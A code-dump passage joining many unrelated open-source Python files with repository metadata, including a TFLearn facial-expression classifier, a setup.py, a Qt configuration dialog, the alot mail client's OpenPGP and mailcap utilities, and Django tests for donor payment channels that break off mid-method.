main.log(self.args, '\n{:.5f}s'.format(time.clock() - self.start) + ' Validation Loss = {:.5f}'.format(state.val_loss) + ' Validation Accuracy = ' + str(state.val_acc))
class Classifier:
def __init__(self, args, start_time, num_classes, save_path, input_shape, scope_name, model):
tf.reset_default_graph()
self.args = args
self.scope_name = scope_name
self.start_time = start_time
self.save_path = self.args.resource_dir + self.args.model_name + self.scope_name
network = self.build_network(num_classes, input_shape, model)
self.model = tflearn.DNN(network, checkpoint_path=self.save_path, max_checkpoints=1, tensorboard_verbose=3, tensorboard_dir=self.save_path + 'tensorboard')
def load(self):
self.model.load(self.save_path + 'model.model')
@staticmethod
def local(input, nb_filters, filter_size, stride, name):
local = LocallyConnected2D(nb_filters, filter_size, strides=(stride, stride), use_bias=True, kernel_initializer='random_normal', bias_initializer='random_normal', name=name)
local.build(input.get_shape().as_list())
return local.call(input)
def build_network(self, num_classes, input_shape, model):
network = tflearn.input_data(shape=[None, input_shape[0], input_shape[1], input_shape[2]])
if model == 'DeepFace':
conv_1 = tflearn.relu(tflearn.conv_2d(network, 32, 11, strides=1, padding='VALID', name='Conv2d_1'))
maxpool_1 = tflearn.max_pool_2d(conv_1, 3, strides=2, padding='VALID', name='MaxPool_1')
conv_2 = tflearn.relu(tflearn.conv_2d(maxpool_1, 32, 9, strides=1, padding='VALID', name='Conv2d_2'))
local_1 = tflearn.relu(self.local(conv_2, 16, 9, 1, 'Local_1'))
local_2 = tflearn.relu(self.local(local_1, 16, 7, 1, 'Local_2'))
local_3 = tflearn.relu(self.local(local_2, 16, 5, 1, 'Local_3'))
flatterned = tflearn.flatten(local_3)
full_1 = tflearn.dropout(tflearn.relu(tflearn.fully_connected(flatterned, 4096, name='Fully_Connected_1')), 0.5)
output = tflearn.fully_connected(full_1, num_classes, activation='softmax', name='Output')
elif model == 'Song':
conv_1 = tflearn.relu(tflearn.conv_2d(network, 64, 5, strides=1, padding='VALID', name='Conv_1'))
maxpool_1 = tflearn.max_pool_2d(conv_1, 3, strides=2, padding='VALID', name='MaxPool_1')
conv_2 = tflearn.relu(tflearn.conv_2d(maxpool_1, 64 , 5, strides=1, padding='VALID', name='Conv_2'))
maxpool_2 = tflearn.max_pool_2d(conv_2, 3, strides=2, padding='VALID', name='MaxPool_2')
local_1 = tflearn.dropout(tflearn.relu(self.local(maxpool_2, 32, 3, 1, 'Local_1')), 1)
local_2 = tflearn.dropout(tflearn.relu(self.local(local_1, 32, 3, 1, 'Local_2')), 1)
flatterned = tflearn.flatten(local_2)
output = tflearn.fully_connected(flatterned, num_classes, activation='softmax', name='Output')
else:
conv_1 = tflearn.relu(tflearn.conv_2d(network, 64, 7, strides=2, bias=True, padding='VALID', name='Conv2d_1'))
maxpool_1 = tflearn.batch_normalization(tflearn.max_pool_2d(conv_1, 3, strides=2, padding='VALID', name='MaxPool_1'))
conv_2a = tflearn.relu(tflearn.conv_2d(maxpool_1, 96, 1, strides=1, padding='VALID', name='Conv_2a_FX1'))
maxpool_2a = tflearn.max_pool_2d(maxpool_1, 3, strides=1, padding='VALID', name='MaxPool_2a_FX1')
conv_2b = tflearn.relu(tflearn.conv_2d(conv_2a, 208, 3, strides=1, padding='VALID', name='Conv_2b_FX1'))
conv_2c = tflearn.relu(tflearn.conv_2d(maxpool_2a, 64, 1, strides=1, padding='VALID', name='Conv_2c_FX1'))
FX1_out = tflearn.merge([conv_2b, conv_2c], mode='concat', axis=3, name='FX1_out')
conv_3a = tflearn.relu(tflearn.conv_2d(FX1_out, 96, 1, strides=1, padding='VALID', name='Conv_3a_FX2'))
maxpool_3a = tflearn.max_pool_2d(FX1_out, 3, strides=1, padding='VALID', name='MaxPool_3a_FX2')
conv_3b = tflearn.relu(tflearn.conv_2d(conv_3a, 208, 3, strides=1, padding='VALID', name='Conv_3b_FX2'))
conv_3c = tflearn.relu(tflearn.conv_2d(maxpool_3a, 64, 1, strides=1, padding='VALID', name='Conv_3c_FX2'))
FX2_out = tflearn.merge([conv_3b, conv_3c], mode='concat', axis=3, name='FX2_out')
net = tflearn.flatten(FX2_out)
output = tflearn.fully_connected(net, num_classes, activation='softmax', name='Output')
return tflearn.regression(output, optimizer='Adam', loss='categorical_crossentropy', learning_rate=0.000001)
def train(self, training_data, testing_data):
x, y = [m[0] for m in training_data], [n[1] for n in training_data]
monitor = MonitorCallback(self.args, self.start_time)
self.model.fit(x, y, n_epoch=self.args.epochs, validation_set=0.1, shuffle=True, show_metric=True, batch_size=self.args.batch_size, snapshot_step=2000, snapshot_epoch=True,
run_id=self.args.model_name, callbacks=monitor)
main.log(self.args, '{:.5f}s '.format(time.clock() - self.start_time) + str(self.count_trainable_vars()) + ' trainable parameters')
self.model.save(self.save_path + 'model.model')
predictions, labels = self.evaluate(testing_data)
self.confusion_matrix(self.args, predictions, labels)
def classify(self, data):
return self.model.predict(data)
def evaluate(self, testing_data):
predictions = []
for data in testing_data:
predictions.append((self.model.predict([data[0]]), data[1]))
return [m[0] for m in predictions], [n[1] for n in predictions]
def load_model(self):
self.model.load(self.save_path + 'model.model')
@staticmethod
def count_trainable_vars():
total_parameters = 0
for variable in tf.trainable_variables():
shape = variable.get_shape()
variable_parametes = 1
for dim in shape:
variable_parametes *= dim.value
total_parameters += variable_parametes
return total_parameters
@staticmethod
def confusion_matrix(args, predictions, labels):
y_actu = np.zeros(len(labels))
for i in range(len(labels)):
for j in range(len(labels[i])):
if labels[i][j] == 1.00:
y_actu[i] = j
y_pred = np.zeros(len(predictions))
for i in range(len(predictions)):
y_pred[i] = np.argmax(predictions[i])
p_labels = pd.Series(y_pred)
t_labels = pd.Series(y_actu)
df_confusion = pd.crosstab(t_labels, p_labels, rownames=['Actual'], colnames=['Predicted'], margins=True)
main.log(args, '\nAccuracy = ' + str(accuracy_score(y_true=y_actu, y_pred=y_pred, normalize=True)) + '\n')
main.log(args, df_confusion)
main.log(args, ' ')
main.log(args, classification_report(y_actu, y_pred))
@staticmethod
def split_data(seq, num):
count, out = -1, []
while count < len(seq):
temp = []
for i in range(num):
count += 1
if count >= len(seq):
break
temp.append(seq[count])
if len(temp) != 0:
out.append(temp)
return out
|
jmcjacob/EmotionalExpressionClassifier
|
classifier.py
|
Python
|
gpl-3.0
| 7,316
|
__all__ = ['os2']
|
rocky/pyimport-relative
|
test/__init__.py
|
Python
|
gpl-3.0
| 18
|
from setuptools import setup, find_packages
setup(name='pcntoolkit',
version='0.20',
description='Predictive Clinical Neuroscience toolkit',
url='http://github.com/amarquand/nispat',
author='Andre Marquand',
author_email='a.marquand@donders.ru.nl',
license='GNU GPLv3',
packages=find_packages(),
install_requires=[
'argparse',
'nibabel>=2.5.1',
'six',
'sklearn',
'bspline',
'matplotlib',
'numpy>=1.19.5',
'scipy>=1.3.2',
'pandas>=0.25.3',
'torch>=1.1.0',
'sphinx-tabs',
'pymc3>=3.8,<=3.9.3',
'theano==1.0.5',
'arviz==0.11.0'
],
zip_safe=False)
|
amarquand/nispat
|
setup.py
|
Python
|
gpl-3.0
| 747
|
import uuid
SECRET_KEY = uuid.uuid4()
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'travis_ci_db',
'USER': 'travis',
'PASSWORD': '',
'HOST': '127.0.0.1',
}
}
MIDDLEWARE_CLASSES = ()
INSTALLED_APPS = (
'test_models',
)
|
yavia/django-namedtuples
|
django_settings.py
|
Python
|
gpl-3.0
| 317
|
n=int(input())-1
a=1
b=1
i=1
print(a)
print(a)
while i<n:
c=a
a=a+b
b=c
i=i+1
print(a)
|
ComputersMania/python-stuff
|
fibonacci.py
|
Python
|
gpl-3.0
| 91
|
#-----------------------------------------------------------------------------
# Copyright (c) 2015-2020, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License (version 2
# or later) with exception for distributing the bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#
# SPDX-License-Identifier: (GPL-2.0-or-later WITH Bootloader-exception)
#-----------------------------------------------------------------------------
# Hook for the pyopencl module: https://github.com/pyopencl/pyopencl
from PyInstaller.utils.hooks import copy_metadata, collect_data_files
datas = copy_metadata('pyopencl')
datas += collect_data_files('pyopencl')
|
etherkit/OpenBeacon2
|
client/linux-arm/venv/lib/python3.6/site-packages/PyInstaller/hooks/hook-pyopencl.py
|
Python
|
gpl-3.0
| 722
|
# Copyright (C) 2011 Equinor ASA, Norway.
#
# The file 'newconfig.py' is part of ERT - Ensemble based Reservoir Tool.
#
# ERT is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ERT is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE.
#
# See the GNU General Public License at <http://www.gnu.org/licenses/gpl.html>
# for more details.
import os
from qtpy.QtCore import Qt, QSize
from qtpy.QtWidgets import (
QDialog,
QFormLayout,
QLabel,
QDialogButtonBox,
QSpinBox,
QLineEdit,
QWidget,
)
def createSpace(size=5):
"""Creates a widget that can be used as spacing on a panel."""
qw = QWidget()
qw.setMinimumSize(QSize(size, size))
return qw
class NewConfigurationDialog(QDialog):
"""A dialog for selecting defaults for a new configuration."""
def __init__(self, configuration_path, parent=None):
QDialog.__init__(self, parent)
self.setModal(True)
self.setWindowTitle("New configuration file")
self.setMinimumWidth(250)
self.setMinimumHeight(150)
layout = QFormLayout()
directory, filename = os.path.split(configuration_path)
if directory.strip() == "":
directory = os.path.abspath(os.curdir)
self.configuration_path = "%s/%s" % (directory, filename)
else:
self.configuration_path = configuration_path
configuration_location = QLabel()
configuration_location.setText(directory)
configuration_name = QLabel()
configuration_name.setText(filename)
self.num_realizations = QSpinBox()
self.num_realizations.setMinimum(1)
self.num_realizations.setMaximum(1000)
self.num_realizations.setValue(10)
self.storage_path = QLineEdit()
self.storage_path.setText("Storage")
self.storage_path.textChanged.connect(self._validateName)
layout.addRow(createSpace(10))
layout.addRow("Configuration name:", configuration_name)
layout.addRow("Configuration location:", configuration_location)
layout.addRow("Path to store DBase:", self.storage_path)
layout.addRow("Number of realizations", self.num_realizations)
layout.addRow(createSpace(10))
buttons = QDialogButtonBox(
QDialogButtonBox.Ok | QDialogButtonBox.Cancel, Qt.Horizontal, self
)
self.ok_button = buttons.button(QDialogButtonBox.Ok)
layout.addRow(buttons)
buttons.accepted.connect(self.accept)
buttons.rejected.connect(self.reject)
self.setLayout(layout)
def getNumberOfRealizations(self):
return self.num_realizations.value()
def getConfigurationPath(self):
return self.configuration_path
def getStoragePath(self):
"""Return the DBase storage path"""
return str(self.storage_path.text()).strip()
def _validateName(self, name):
name = str(name)
enabled = len(name) > 0 and name.find(" ") == -1
self.ok_button.setEnabled(enabled)
|
joakim-hove/ert
|
ert_gui/newconfig.py
|
Python
|
gpl-3.0
| 3,342
|
# -*- coding: UTF-8 -*-
def frekvencijska_distribucija(sekvenca):
rjecnik={}
for element in sekvenca:
rjecnik[element]=rjecnik.get(element,0)+1
return rjecnik
def sortiraj_distribuciju(rjecnik):
return sorted(rjecnik.items(),key=lambda x:-x[1])
def opojavnici(niz):
import re
return re.findall(r'\w+',niz,re.UNICODE)
# testiranje
if __name__=='__main__':
print frekvencijska_distribucija('neki niz znakova')
print frekvencijska_distribucija([1,2,2,3,3,3,4,4,4,4,])
print sortiraj_distribuciju({'a':3,'b':8,'c':5})
print opojavnici('neki niz znakova')
print opojavnici('Neki neki niz znakova')
|
nljubesi/python-for-linguists
|
funkcije.py
|
Python
|
gpl-3.0
| 613
|
class Filter():
'''
A generic filter class defining a base interface for other classes
performing filtering operations.
'''
pass
class BoxFilter(Filter):
def __init__(self, box, access_lat, access_lng):
'''
:param box: a tuple or Box object defining the area to select
inside as part of the filter. This is defined with two
points: the top left (x1) and the bottom-right (x2) in the
following order for a tuple::
(x1.lat, x1.lng, x2.lat, x2.lng)
:param lambda access_lat: a lambda function for accessing the
latitude of a supplied data element.
:param lambda access_lng: a lambda function for accessing the
longiude of a supplied data element.
'''
self.box = box # TODO: convert to Box class
self.access_lat = access_lat
self.access_lng = access_lng
class ImposmBoxFilter(BoxFilter):
def __init__(self, box):
'''
:param box: a tuple or Box object defining the area to select
inside as part of the filter. This is defined with two
points: the top left (x1) and the bottom-right (x2) in the
following order for a tuple::
(x1.lat, x1.lng, x2.lat, x2.lng)
'''
super().__init__(box, lambda node: node[2][0], lambda node: node[2][1])
|
austinhartzheim/sift
|
sift/filter.py
|
Python
|
gpl-3.0
| 1,369
|
# Copyright (C) 2011-2012 Patrick Totzke <patricktotzke@gmail.com>
# This file is released under the GNU GPL, version 3 or a later revision.
# For further details see the COPYING file
import os
import email
import email.charset as charset
from email.header import Header
from email.iterators import typed_subpart_iterator
import tempfile
import re
import logging
import mailcap
from cStringIO import StringIO
from .. import crypto
from .. import helper
from ..errors import GPGProblem
from ..settings import settings
from ..helper import string_sanitize
from ..helper import string_decode
from ..helper import parse_mailcap_nametemplate
from ..helper import split_commandstring
charset.add_charset('utf-8', charset.QP, charset.QP, 'utf-8')
X_SIGNATURE_VALID_HEADER = 'X-Alot-OpenPGP-Signature-Valid'
X_SIGNATURE_MESSAGE_HEADER = 'X-Alot-OpenPGP-Signature-Message'
def add_signature_headers(mail, sigs, error_msg):
'''Add pseudo headers to the mail indicating whether the signature
verification was successful.
:param mail: :class:`email.message.Message` the message to entitle
:param sigs: list of :class:`gpgme.Signature`
:param error_msg: `str` containing an error message, the empty
string indicating no error
'''
sig_from = ''
if len(sigs) == 0:
error_msg = error_msg or 'no signature found'
else:
try:
key = crypto.get_key(sigs[0].fpr)
for uid in key.uids:
if crypto.check_uid_validity(key, uid.email):
sig_from = uid.uid
uid_trusted = True
break
else:
# No trusted uid found, we did not break but drop from the
# for loop.
uid_trusted = False
sig_from = key.uids[0].uid
except:
sig_from = sigs[0].fpr
uid_trusted = False
mail.add_header(
X_SIGNATURE_VALID_HEADER,
'False' if error_msg else 'True',
)
mail.add_header(
X_SIGNATURE_MESSAGE_HEADER,
u'Invalid: {0}'.format(error_msg)
if error_msg else
u'Valid: {0}'.format(sig_from)
if uid_trusted else
u'Untrusted: {0}'.format(sig_from)
)
def get_params(mail, failobj=None, header='content-type', unquote=True):
'''Get Content-Type parameters as dict.
RFC 2045 specifies that parameter names are case-insensitive, so
we normalize them here.
:param mail: :class:`email.message.Message`
:param failobj: object to return if no such header is found
:param header: the header to search for parameters, default
:param unquote: unquote the values
:returns: a `dict` containing the parameters
'''
failobj = failobj or []
return {k.lower(): v for k, v in mail.get_params(failobj, header, unquote)}
def message_from_file(handle):
'''Reads a mail from the given file-like object and returns an email
object, very much like email.message_from_file. In addition to
that OpenPGP encrypted data is detected and decrypted. If this
succeeds, any mime messages found in the recovered plaintext
message are added to the returned message object.
:param handle: a file-like object
:returns: :class:`email.message.Message` possibly augmented with
decrypted data
'''
m = email.message_from_file(handle)
# make sure noone smuggles a token in (data from m is untrusted)
del m[X_SIGNATURE_VALID_HEADER]
del m[X_SIGNATURE_MESSAGE_HEADER]
p = get_params(m)
app_pgp_sig = 'application/pgp-signature'
app_pgp_enc = 'application/pgp-encrypted'
# handle OpenPGP signed data
if (m.is_multipart() and
m.get_content_subtype() == 'signed' and
p.get('protocol') == app_pgp_sig):
# RFC 3156 is quite strict:
# * exactly two messages
# * the second is of type 'application/pgp-signature'
# * the second contains the detached signature
malformed = False
if len(m.get_payload()) != 2:
malformed = u'expected exactly two messages, got {0}'.format(
len(m.get_payload()))
else:
ct = m.get_payload(1).get_content_type()
if ct != app_pgp_sig:
malformed = u'expected Content-Type: {0}, got: {1}'.format(
app_pgp_sig, ct)
# TODO: RFC 3156 says the alg has to be lower case, but I've
# seen a message with 'PGP-'. maybe we should be more
# permissive here, or maybe not, this is crypto stuff...
if not p.get('micalg', 'nothing').startswith('pgp-'):
malformed = u'expected micalg=pgp-..., got: {0}'.format(
p.get('micalg', 'nothing'))
sigs = []
if not malformed:
try:
sigs = crypto.verify_detached(m.get_payload(0).as_string(),
m.get_payload(1).get_payload())
except GPGProblem as e:
malformed = unicode(e)
add_signature_headers(m, sigs, malformed)
# handle OpenPGP encrypted data
elif (m.is_multipart() and
m.get_content_subtype() == 'encrypted' and
p.get('protocol') == app_pgp_enc and
'Version: 1' in m.get_payload(0).get_payload()):
# RFC 3156 is quite strict:
# * exactly two messages
# * the first is of type 'application/pgp-encrypted'
# * the first contains 'Version: 1'
# * the second is of type 'application/octet-stream'
# * the second contains the encrypted and possibly signed data
malformed = False
ct = m.get_payload(0).get_content_type()
if ct != app_pgp_enc:
malformed = u'expected Content-Type: {0}, got: {1}'.format(
app_pgp_enc, ct)
want = 'application/octet-stream'
ct = m.get_payload(1).get_content_type()
if ct != want:
malformed = u'expected Content-Type: {0}, got: {1}'.format(want,
ct)
if not malformed:
try:
sigs, d = crypto.decrypt_verify(m.get_payload(1).get_payload())
except GPGProblem as e:
# signature verification failures end up here too if
# the combined method is used, currently this prevents
# the interpretation of the recovered plain text
# mail. maybe that's a feature.
malformed = unicode(e)
else:
# parse decrypted message
n = message_from_string(d)
# add the decrypted message to m. note that n contains
# all the attachments, no need to walk over n here.
m.attach(n)
# add any defects found
m.defects.extend(n.defects)
# there are two methods for both signed and encrypted
# data, one is called 'RFC 1847 Encapsulation' by
# RFC 3156, and one is the 'Combined method'.
if len(sigs) == 0:
# 'RFC 1847 Encapsulation', the signature is a
# detached signature found in the recovered mime
# message of type multipart/signed.
if X_SIGNATURE_VALID_HEADER in n:
for k in (X_SIGNATURE_VALID_HEADER,
X_SIGNATURE_MESSAGE_HEADER):
m[k] = n[k]
else:
# an encrypted message without signatures
# should arouse some suspicion, better warn
# the user
add_signature_headers(m, [], 'no signature found')
else:
# 'Combined method', the signatures are returned
# by the decrypt_verify function.
# note that if we reached this point, we know the
# signatures are valid. if they were not valid,
# the else block of the current try would not have
# been executed
add_signature_headers(m, sigs, '')
if malformed:
msg = u'Malformed OpenPGP message: {0}'.format(malformed)
content = email.message_from_string(msg.encode('utf-8'))
content.set_charset('utf-8')
m.attach(content)
return m
def message_from_string(s):
'''Reads a mail from the given string. This is the equivalent of
:func:`email.message_from_string` which does nothing but to wrap
the given string in a StringIO object and to call
:func:`email.message_from_file`.
Please refer to the documentation of :func:`message_from_file` for
details.
'''
return message_from_file(StringIO(s))
def extract_headers(mail, headers=None):
"""
returns subset of this messages headers as human-readable format:
all header values are decoded, the resulting string has
one line "KEY: VALUE" for each requested header present in the mail.
:param mail: the mail to use
:type mail: :class:`email.Message`
:param headers: headers to extract
:type headers: list of str
"""
headertext = u''
if headers is None:
headers = mail.iterkeys()
for key in headers:
value = u''
if key in mail:
value = decode_header(mail.get(key, ''))
headertext += '%s: %s\n' % (key, value)
return headertext
def extract_body(mail, types=None, field_key='copiousoutput'):
"""
returns a body text string for given mail.
If types is `None`, `text/*` is used:
The exact preferred type is specified by the prefer_plaintext config option
which defaults to text/html.
:param mail: the mail to use
:type mail: :class:`email.Message`
:param types: mime content types to use for body string
:type types: list of str
"""
preferred = 'text/plain' if settings.get(
'prefer_plaintext') else 'text/html'
has_preferred = False
# see if the mail has our preferred type
if types is None:
has_preferred = list(typed_subpart_iterator(
mail, *preferred.split('/')))
body_parts = []
for part in mail.walk():
ctype = part.get_content_type()
if types is not None:
if ctype not in types:
continue
cd = part.get('Content-Disposition', '')
if cd.startswith('attachment'):
continue
# if the mail has our preferred type, we only keep this type
# note that if types != None, has_preferred always stays False
if has_preferred and ctype != preferred:
continue
enc = part.get_content_charset() or 'ascii'
raw_payload = part.get_payload(decode=True)
if ctype == 'text/plain':
raw_payload = string_decode(raw_payload, enc)
body_parts.append(string_sanitize(raw_payload))
else:
# get mime handler
_, entry = settings.mailcap_find_match(ctype, key=field_key)
tempfile_name = None
stdin = None
if entry:
handler_raw_commandstring = entry['view']
# in case the mailcap defined command contains no '%s',
# we pipe the files content to the handling command via stdin
if '%s' in handler_raw_commandstring:
# open tempfile, respect mailcaps nametemplate
nametemplate = entry.get('nametemplate', '%s')
prefix, suffix = parse_mailcap_nametemplate(nametemplate)
with tempfile.NamedTemporaryFile(
delete=False, prefix=prefix, suffix=suffix) \
as tmpfile:
tmpfile.write(raw_payload)
tempfile_name = tmpfile.name
else:
stdin = raw_payload
# read parameter, create handler command
parms = tuple('='.join(p) for p in part.get_params())
# create and call external command
cmd = mailcap.subst(entry['view'], ctype,
filename=tempfile_name, plist=parms)
logging.debug('command: %s', cmd)
logging.debug('parms: %s', str(parms))
cmdlist = split_commandstring(cmd)
# call handler
rendered_payload, _, _ = helper.call_cmd(cmdlist, stdin=stdin)
# remove tempfile
if tempfile_name:
os.unlink(tempfile_name)
if rendered_payload: # handler had output
body_parts.append(string_sanitize(rendered_payload))
return u'\n\n'.join(body_parts)
def decode_header(header, normalize=False):
"""
decode a header value to a unicode string
values are usually a mixture of different substrings
encoded in quoted printable using different encodings.
This turns it into a single unicode string
:param header: the header value
:type header: str
:param normalize: replace trailing spaces after newlines
:type normalize: bool
:rtype: unicode
"""
# If the value isn't ascii as RFC2822 prescribes,
# we just return the unicode bytestring as is
value = string_decode(header) # convert to unicode
try:
value = value.encode('ascii')
except UnicodeEncodeError:
return value
# some mailers send out incorrectly escaped headers
# and double quote the escaped realname part again. remove those
# RFC: 2047
regex = r'"(=\?.+?\?.+?\?[^ ?]+\?=)"'
value = re.sub(regex, r'\1', value)
logging.debug("unquoted header: |%s|", value)
# otherwise we interpret RFC2822 encoding escape sequences
valuelist = email.header.decode_header(value)
decoded_list = []
for v, enc in valuelist:
v = string_decode(v, enc)
decoded_list.append(string_sanitize(v))
value = u' '.join(decoded_list)
if normalize:
value = re.sub(r'\n\s+', r' ', value)
return value
def encode_header(key, value):
"""
encodes a unicode string as a valid header value
:param key: the header field this value will be stored in
:type key: str
:param value: the value to be encoded
:type value: unicode
"""
# handle list of "realname <email>" entries separately
if key.lower() in ['from', 'to', 'cc', 'bcc']:
rawentries = value.split(',')
encodedentries = []
for entry in rawentries:
m = re.search(r'\s*(.*)\s+<(.*\@.*\.\w*)>\s*$', entry)
if m: # If a realname part is contained
name, address = m.groups()
# try to encode as ascii, if that fails, revert to utf-8
# name must be a unicode string here
namepart = Header(name)
# append address part encoded as ascii
entry = '%s <%s>' % (namepart.encode(), address)
encodedentries.append(entry)
value = Header(', '.join(encodedentries))
else:
value = Header(value)
return value
def is_subdir_of(subpath, superpath):
# make both absolute
superpath = os.path.realpath(superpath)
subpath = os.path.realpath(subpath)
# return true, if the common prefix of both is equal to directory
# e.g. /a/b/c/d.rst and directory is /a/b, the common prefix is /a/b
return os.path.commonprefix([subpath, superpath]) == superpath
|
dcbaker/alot
|
alot/db/utils.py
|
Python
|
gpl-3.0
| 15,715
|
"""Utiliary classes for testing."""
from financeager import clients, config
class Client(clients.LocalServerClient):
"""Implementation that assigns dummy sinks to consume the client's output.
The underlying Proxy is patched to store data in memory instead of in
financeager.DATA_DIR.
"""
def __init__(self):
f = lambda s: None
super().__init__(
configuration=config.Configuration(), sinks=clients.Client.Sinks(f, f)
)
self.proxy._pocket_kwargs["data_dir"] = None
|
pylipp/financeager
|
test/utils.py
|
Python
|
gpl-3.0
| 531
|
# -*- coding: utf-8 -*-
# Author: Petr Dlouhý <petr.dlouhy@auto-mat.cz>
#
# Copyright (C) 2017 o.s. Auto*Mat
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import datetime
from django.test import TestCase
from freezegun import freeze_time
from model_mommy import mommy
from model_mommy.recipe import Recipe
from ..utils import ICON_FALSE
from aklub.models import DonorPaymentChannel, Profile
@freeze_time("2010-5-1")
class TestNoUpgrade(TestCase):
"""Test TerminalCondition.no_upgrade()"""
def setUp(self):
self.administrative_unit = mommy.make(
"aklub.AdministrativeUnit",
name="test",
)
self.bank_account = mommy.make(
"aklub.BankAccount",
administrative_unit=self.administrative_unit,
)
self.event = mommy.make(
"events.event",
administrative_units=[
self.administrative_unit,
],
)
def test_not_regular(self):
"""Test DonorPaymentChannel with regular_payments=False returns False"""
for model in Profile.__subclasses__():
model_name = model._meta.model_name
profile = mommy.make(
model_name,
username="test.{}".format(model_name),
)
donor_payment_channel = mommy.make(
"aklub.DonorPaymentChannel",
campaign__name="Foo campaign",
user=profile,
money_account=self.bank_account,
event=self.event,
)
self.assertEqual(
donor_payment_channel.no_upgrade,
False,
)
def test_not_regular_for_one_year(self):
"""Test DonorPaymentChannel that is not regular for at leas one year"""
for model in Profile.__subclasses__():
model_name = model._meta.model_name
profile = mommy.make(
model_name,
username="test.{}".format(model_name),
)
donor_payment_channel = mommy.make(
"aklub.DonorPaymentChannel",
campaign__name="Foo campaign",
regular_payments="regular",
user=profile,
money_account=self.bank_account,
event=self.event,
)
self.assertEqual(
donor_payment_channel.no_upgrade,
False,
)
def test_no_last_year_payments(self):
"""Test DonorPaymentChannel that has zero payments from last year"""
for model in Profile.__subclasses__():
model_name = model._meta.model_name
profile = mommy.make(
model_name,
username="test.{}".format(model_name),
)
donor_payment_channel = mommy.make(
"aklub.DonorPaymentChannel",
campaign__name="Foo campaign",
regular_payments="regular",
payment_set=[
mommy.make(
"Payment", date=datetime.date(year=2010, month=4, day=1)
),
],
user=profile,
money_account=self.bank_account,
event=self.event,
)
donor_payment_channel.save()
self.assertEqual(
donor_payment_channel.no_upgrade,
False,
)
def test_missing_payments(self):
"""Test DonorPaymentChannel that has different amount on payments before one year"""
for model in Profile.__subclasses__():
model_name = model._meta.model_name
profile = mommy.make(
model_name,
username="test.{}".format(model_name),
)
donor_payment_channel = mommy.make(
"aklub.DonorPaymentChannel",
campaign__name="Foo campaign",
regular_payments="regular",
payment_set=[
mommy.make(
"Payment",
date=datetime.date(year=2010, month=4, day=1),
amount=100,
),
mommy.make(
"Payment",
date=datetime.date(year=2009, month=3, day=1),
amount=200,
),
],
user=profile,
money_account=self.bank_account,
event=self.event,
)
donor_payment_channel.save()
self.assertEqual(
donor_payment_channel.no_upgrade,
False,
)
def test_regular(self):
"""Test DonorPaymentChannel that has regular payments"""
for model in Profile.__subclasses__():
model_name = model._meta.model_name
profile = mommy.make(
model_name,
username="test.{}".format(model_name),
)
donor_payment_channel = mommy.make(
"aklub.DonorPaymentChannel",
campaign__name="Foo campaign",
regular_payments="regular",
payment_set=[
mommy.make(
"Payment",
date=datetime.date(year=2010, month=4, day=1),
amount=100,
),
mommy.make(
"Payment",
date=datetime.date(year=2009, month=3, day=1),
amount=100,
),
],
user=profile,
money_account=self.bank_account,
event=self.event,
)
donor_payment_channel.save()
self.assertEqual(
donor_payment_channel.no_upgrade,
True,
)
@freeze_time("2016-6-1")
class TestExtraMoney(TestCase):
"""Test TerminalCondition.extra_money()"""
def setUp(self):
administrative_unit = mommy.make(
"aklub.AdministrativeUnit",
name="test",
)
self.bank_account = mommy.make(
"aklub.BankAccount",
administrative_unit=administrative_unit,
)
self.event = mommy.make(
"events.event",
administrative_units=[
administrative_unit,
],
)
self.donor_payment_channel = Recipe(
"aklub.DonorPaymentChannel",
campaign__name="Foo campaign",
user__first_name="Foo user",
money_account=self.bank_account,
event=self.event,
)
def test_extra_payment(self):
"""Test DonorPaymentChannel with extra payment"""
for model in Profile.__subclasses__():
model_name = model._meta.model_name
profile = mommy.make(
model_name,
username="test.{}".format(model_name),
)
donor_payment_channel = self.donor_payment_channel.make(
regular_amount=100,
regular_payments="regular",
regular_frequency="monthly",
payment_set=[
mommy.make(
"Payment",
date=datetime.date(year=2016, month=5, day=5),
amount=250,
),
],
user=profile,
money_account=self.bank_account,
)
donor_payment_channel.save()
self.assertEqual(donor_payment_channel.extra_money, 150)
self.assertEqual(donor_payment_channel.extra_payments(), "150 Kč")
def test_payment_too_old(self):
"""Test that if the payment is older than 27 days, it is not counted in"""
for model in Profile.__subclasses__():
model_name = model._meta.model_name
profile = mommy.make(
model_name,
username="test.{}".format(model_name),
)
donor_payment_channel = self.donor_payment_channel.make(
regular_amount=100,
regular_payments="regular",
regular_frequency="monthly",
payment_set=[
mommy.make(
"Payment",
date=datetime.date(year=2016, month=5, day=4),
amount=250,
),
],
user=profile,
money_account=self.bank_account,
)
donor_payment_channel.save()
self.assertEqual(donor_payment_channel.extra_money, None)
self.assertEqual(donor_payment_channel.extra_payments(), ICON_FALSE)
def test_no_extra_payment(self):
"""Test DonorPaymentChannel with extra payment"""
for model in Profile.__subclasses__():
model_name = model._meta.model_name
profile = mommy.make(
model_name,
username="test.{}".format(model_name),
)
donor_payment_channel = self.donor_payment_channel.make(
regular_amount=100,
regular_payments="regular",
regular_frequency="monthly",
user=profile,
money_account=self.bank_account,
)
donor_payment_channel.save()
self.assertEqual(donor_payment_channel.extra_money, None)
self.assertEqual(donor_payment_channel.extra_payments(), ICON_FALSE)
def test_no_frequency(self):
"""Test DonorPaymentChannel with no regular frequency"""
for model in Profile.__subclasses__():
model_name = model._meta.model_name
profile = mommy.make(
model_name,
username="test.{}".format(model_name),
)
donor_payment_channel = self.donor_payment_channel.make(
regular_amount=100,
regular_payments="regular",
regular_frequency=None,
user=profile,
money_account=self.bank_account,
)
donor_payment_channel.save()
self.assertEqual(donor_payment_channel.extra_money, None)
self.assertEqual(donor_payment_channel.extra_payments(), ICON_FALSE)
def test_not_regular(self):
"""Test when DonorPaymentChannel is not regular"""
for model in Profile.__subclasses__():
